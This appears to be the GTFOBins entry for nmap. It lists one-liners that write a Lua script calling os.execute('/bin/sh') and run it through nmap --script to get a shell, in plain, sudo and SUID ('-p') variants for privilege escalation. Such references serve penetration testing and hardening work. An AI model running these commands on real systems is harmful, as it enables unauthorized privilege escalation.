GTFOBins.github.io/_gtfobins/nmap.md
2018-08-23 18:11:27 +02:00

525 B

functions
execute-interactive sudo-enabled suid-enabled
description code
Input echo is disabled. TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF nmap --script=$TF
description code
Input echo is disabled. TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF sudo nmap --script=$TF
description code
Input echo is disabled. TF=$(mktemp) echo 'os.execute("/bin/sh -p")' > $TF ./nmap --script=$TF